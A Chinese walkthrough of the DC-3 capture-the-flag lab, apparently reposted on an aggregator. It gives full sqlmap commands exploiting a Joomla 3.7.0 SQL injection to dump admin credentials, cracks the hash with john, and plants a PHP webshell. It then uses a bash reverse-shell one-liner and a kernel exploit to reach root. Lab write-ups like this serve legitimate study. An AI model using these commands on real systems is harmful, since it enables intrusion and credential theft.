小H靶场笔记:DC-3

DC-3

January 3, 2024 4:11 PM
Tags:Joomla
owner:只惠摸鱼

信息收集

  • 探测靶机ip: 192.168.199.133

    在这里插入图片描述

  • nmap 扫描端口、 系统版本 漏洞

    在这里插入图片描述

    • 发现只有80端口开发, 且有cve-2017-8917漏洞存在
    • 是Joomla的SQL注入漏洞 Joomla版本为3.7.0

  • 打开页面看一下发现有登录页面,可以尝试弱口令,sql注入 或 爆破(页面有提示。只有一个flag,且为root权限才能看到)

    在这里插入图片描述

    • 尝试弱口令无果

漏洞利用

  • 使用kali中searchsploit 搜索cve-2017-8917 即搜索joomla 3.7.0的漏洞

在这里插入图片描述

  • 查看内容

    • searchsploit -x php/webapps/42033.txt

      在这里插入图片描述

    • 发现可以直接使用sqlmap 爆数据库

SQLmap爆数据

  • 爆数据库(默认配置选项)

    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
      在这里插入图片描述

    • 得到数据库joomladb

  • 爆数据库表

    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables --batch -p list[fullordering]

      • —batch是为了使其默认使用默认配置选项

      在这里插入图片描述

    • 得到表#__users

  • 爆表字段名(不能使用默认,需要手动y一下)

    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]

      在这里插入图片描述

    • 只需查字段username 和 password中的值就可以了

  • 爆数据

    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” -C “username,password” --dump -p list[fullordering]

      在这里插入图片描述

    • 拿到admin账号 和一个 hash加密的密码

john解密

  • 密码:$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,放入txt文档

    在这里插入图片描述

    • 使用john进行解密
      在这里插入图片描述

    • 得到管理员账户密码

  • 发现还没有扫过目录,扫一下,看看是不是有管理员登录端(80端口只有用户端)

    • dirb http://192.168.199.133
      在这里插入图片描述

    • 发现有管理员页面

      在这里插入图片描述

    • 使用刚才得到的管理员账号密码登录,进入后端管理页面

      在这里插入图片描述

    • 寻找是否有能上传文件的地方,尝试了一些,都不太行,最后找到了一个可以直接写php代码的页面。

      在这里插入图片描述

    • 新增一个php文件类型,写入一句话木马
      在这里插入图片描述

    • 发现上方有提示的路径,尝试直接访问一下

      在这里插入图片描述

    • 发现不通, 百度了joomla的文件路径
      在这里插入图片描述

    • 发现一个熟悉的单词, 尝试用这个试一下(没报错,有戏)
      在这里插入图片描述

      • 继续尝试目录或文件,发现没报错。

        在这里插入图片描述

      • 尝试一下phpinfo(),成功!

      在这里插入图片描述

  • 使用蚁剑直接连接
    在这里插入图片描述

    • 成功连接

      在这里插入图片描述

    • 打开命令端口,发现不是root 也不是管理员权限

    在这里插入图片描述

提权

  • 查看系统内核版本

    在这里插入图片描述

  • 直接使用searchsploit Ubuntu 16.04查询相关漏洞,对比内核版本和漏洞类型,使用39772

    在这里插入图片描述

  • 查看漏洞内容,最上面的连接可以直接拉到浏览器查看详细信息(个人认为比较方便)

    • searchsploit -x linux/local/39772.txt

      在这里插入图片描述

  • 根据漏洞信息,和下方提供的漏洞下载链接下载到kali,通过蚁剑上传到后台解压exploit(这里是我运行过一次)

    在这里插入图片描述

  • 将shell反弹给本地

    • 本地监听1234端口

      在这里插入图片描述

    • 被控端运行bash -c 'bash -i >& /dev/tcp/192.168.199.129/1234 0>&1’

    • 本地得到shell

      在这里插入图片描述

  • 进入到ebpf_mapfd_doubleput_exploit运行./compile.sh会生成doubleput

  • 然后再运行./doubleput等待数秒,得到root权限

    在这里插入图片描述

  • 生成交互性shell

    • python3 -c 'import pty; pty.spawn(“/bin/bash”)’

      在这里插入图片描述

  • 进入/root 查询文件,找到flag。
    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/593936.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

相关性与P值

相关性与P值

相关性与P值 0 FQA:1 相关性与显著性的关系2 相关性分析3 使用medcalc进行相关性分析:参考文章: 0 FQA: 主要描述相关性和p值分别代表什么意义? 以及如何使用medcalc计算相关性和p值。 Q1:p值代表什么意义…
阅读更多...
【每日一题】466. 统计重复个数-2024.1.2

【每日一题】466. 统计重复个数-2024.1.2

题目: 466. 统计重复个数 定义 str [s, n] 表示 str 由 n 个字符串 s 连接构成。 例如,str ["abc", 3] "abcabcabc" 。 如果可以从 s2 中删除某些字符使其变为 s1,则称字符串 s1 可以从字符串 s2 获得。 例如&…
阅读更多...
主流桌面浏览器Chrome,FireFox和Edge等如何禁用弹出式窗口阻止程序,这里有详细步骤

主流桌面浏览器Chrome,FireFox和Edge等如何禁用弹出式窗口阻止程序,这里有详细步骤

为什么你想知道如何禁用浏览器中的弹出式窗口阻止程序?毕竟,弹出式窗口是网络的祸害:显示烦人的广告、虚假的安全消息和其他刺激,会分散你的浏览注意力,甚至可能包含恶意代码。 所有主要的桌面浏览器现在都默认阻止弹出式窗口,那么你到底为什么要取消阻止这些害虫呢?事…
阅读更多...
【力扣100】39.组合总和

【力扣100】39.组合总和

添加链接描述 class Solution:def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:def backtrack(path,target,res,index):if target0:res.append(path[:])returnif target<0:return for i in range(index,len(candidates)):if target&g…
阅读更多...
c盘扩容时,d盘无法删除卷问题

c盘扩容时,d盘无法删除卷问题

C盘扩容时&#xff0c;磁盘管理中D盘右键无法删除卷的原因 首先&#xff0c;D盘下文件夹为空&#xff0c;但是显示可用空间不是100%&#xff0c;经过排查&#xff0c;发现是虚拟内存设置在了D盘导致无法删除卷&#xff0c;这里只需要将虚拟内存放到其他盘&#xff0c;如E盘即可…
阅读更多...
【MyBatis】配置 SQL 提示(IDEA 代码自动补全)和解决未能解析数据库 Unable to resolve table ‘employee‘ 问题

【MyBatis】配置 SQL 提示(IDEA 代码自动补全)和解决未能解析数据库 Unable to resolve table ‘employee‘ 问题

默认在 MyBatis 中编写 SQL 语句是不识别的。 需要做如下配置&#xff1a; 然后 SQL 语句可以出现提示&#xff0c;但是自己的数据库会报错&#xff1a; 原因是 IDEA 没有和 数据库 建立连接&#xff0c;需要连接数据库&#xff08;注意&#xff1a;需要具体到某个 Schema&…
阅读更多...
springCloud之Stream

springCloud之Stream

1、简介 Spring Cloud Stream是一个用来为微服务应用构建 消息驱动 能力的框架。通过使用 Spring Cloud Strea m &#xff0c;可以有效简化开发人员对消息中间件的使用复杂度&#xff0c;降低代码与消息中间件间的耦合度&#xff0c;屏蔽消息中间件 之 间的差异性&#xff0c;…
阅读更多...
stm32学习总结:5、Proteus8+STM32CubeMX+MDK仿真串口并使用串口打印日志(注意重定向printf到串口打印的问题)

stm32学习总结:5、Proteus8+STM32CubeMX+MDK仿真串口并使用串口打印日志(注意重定向printf到串口打印的问题)

stm32学习总结&#xff1a;5、Proteus8STM32CubeMXMDK仿真串口并使用串口打印日志&#xff08;注意重定向printf到串口打印的问题&#xff09; 文章目录 stm32学习总结&#xff1a;5、Proteus8STM32CubeMXMDK仿真串口并使用串口打印日志&#xff08;注意重定向printf到串口打印…
阅读更多...
软碟通UltraISO制作U盘安装Ubuntu

软碟通UltraISO制作U盘安装Ubuntu

清华大学开源软件镜像站https://mirrors.tuna.tsinghua.edu.cn/ 从里面下载ubuntu-22.04-desktop-amd64.iso UltraISO是一款非常不错的U盘启动盘制作工具&#xff0c;一直被许多网友们所喜欢&#xff0c;使用简单、方便。 UltraISO官方下载地址&#xff1a;https://cn.ultrais…
阅读更多...
魔改版小市值策略

魔改版小市值策略

策略思路 最近几年&#xff0c;小市值策略一直都收益不错&#xff08;当然&#xff0c;不包含17年和18年&#xff09;。小市值因子对收益的影响是很大的。特别是行情不好的时候&#xff0c;大家都忙着炒作热点&#xff0c;那么这时候符合题材的小市值更加符合炒作标准了。 为…
阅读更多...
安装tensorrt环境在linux上

安装tensorrt环境在linux上

在linux上输入命令 bash cat /etc/os-release 命令查看系统版本 nvidia-smi命令后有内容弹出而没有报错,表明系统中安装了NVIDIA显卡驱动&#xff0c;并且该命令成功地显示了有关NVIDIA GPU的信息。 输入nvcc -V并且看到输出时,这表明您的系统中已经安装了NVIDIA的CUDA工具…
阅读更多...
MySQL第三战:CRUD,函数1以及unionunion all

MySQL第三战:CRUD,函数1以及unionunion all

前言 在当今的数字化时代&#xff0c;数据库已经成为信息管理的重要工具。其中&#xff0c;MySQL作为一种流行的关系型数据库管理系统&#xff0c;已经广泛应用于各种业务场景。在本文中&#xff0c;我们将深入探讨MySQL中的核心概念&#xff0c;包括创建&#xff08;Create&a…
阅读更多...
[每周一更]-(第51期):Go的调度器GMP

[每周一更]-(第51期):Go的调度器GMP

参考文献 https://learnku.com/articles/41728http://go.cyub.vip/gmp/gmp-model.html#g-m-phttps://blog.csdn.net/ByteDanceTech/article/details/129292683https://www.ququ123.top/2022/04/golang_gmp_principle/ 什么是GMP? GMP模型是Go语言并发模型的核心概念&#x…
阅读更多...
ASP.NET Core基础之图片文件(一)-WebApi访问静态图片

ASP.NET Core基础之图片文件(一)-WebApi访问静态图片

阅读本文你的收获&#xff1a; 学会在WebApi项目中访问静态图片了解静态文件中间件UseStaticFiles的用法 系统中免不了要去处理图片文件&#xff0c;比如上传商品的图片、显示商品的图片&#xff0c;访问系统中的图片等等&#xff0c;根据微软官网描述&#xff1a; 静态文件&a…
阅读更多...
自动化测试框架 —— pytest框架入门到入职篇

自动化测试框架 —— pytest框架入门到入职篇

01、pytest框架介绍 pytest 是 python 的第三方单元测试框架&#xff0c;比自带 unittest 更简洁和高效&#xff0c;支持非常丰富的插件&#xff0c;同时兼容 unittest 框架。这就使得我们在 unittest 框架迁移到 pytest 框架的时候不需要重写代码。 pytest框架优点 1、简单…
阅读更多...
Ubuntu Server 22.04 连接Wifi并配置静态IP

Ubuntu Server 22.04 连接Wifi并配置静态IP

Ubuntu Server 22.04 连接Wifi并配置静态IP 前言&#xff1a;我家最近好几台电脑&#xff0c;我都想跑着Ubuntu Server做服务器&#xff0c;但是近几年的超级本已经不自带网口了&#xff0c;所以我就考虑用Wifi来联网&#xff0c;速度也还可以&#xff0c;但是既然是跑服务&…
阅读更多...
Nginx 中的日志

Nginx 中的日志

目录 1.定制访问日志记录格式 1.1 全部日志记录 1.2 每个网站独属一份日志 2.日志路径 3.错误日志 1.定制访问日志记录格式 1.1 全部日志记录 该配置处于nginx.conf 文件中 log_format compression $remote_addr - $remote_user [$time_local] "$request" $sta…
阅读更多...
技术扫盲:如何优雅的使用 java -jar

技术扫盲:如何优雅的使用 java -jar

java -jar xxx.jar java -jar 是一个用于在命令行界面中执行 Java 可执行 JAR 文件的命令。它的语法如下&#xff1a; java -jar <JAR 文件路径> [参数]其中&#xff1a; java 是 Java 运行时环境的可执行文件。-jar 是一个选项&#xff0c;表示要执行的文件是一个 JA…
阅读更多...
Postman版IDEA插件!免费!

Postman版IDEA插件!免费!

Postman是大家最常用的API调试工具&#xff0c;那么有没有一种方法可以不用手动写入接口到Postman&#xff0c;即可进行接口调试操作&#xff1f;今天给大家推荐一款IDEA插件&#xff1a;Apipost Helper&#xff0c;写完代码就可以调试接口并一键生成接口文档&#xff01;而且还…
阅读更多...
一文读懂Solana 上最正统的铭文通证$mash

一文读懂Solana 上最正统的铭文通证$mash

早在 2023 年的 11 月&#xff0c;包括 Solana、Avalanche、Polygon、Arbitrum、zkSync 等生态正在承接比特币铭文生态外溢的价值。当然&#xff0c;因铭文赛道过于火爆&#xff0c;当 Avalanche、BNB Chain 以及 Polygon 等链上 Gas 飙升至极值&#xff0c;Arbitrum、zkSync 等…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023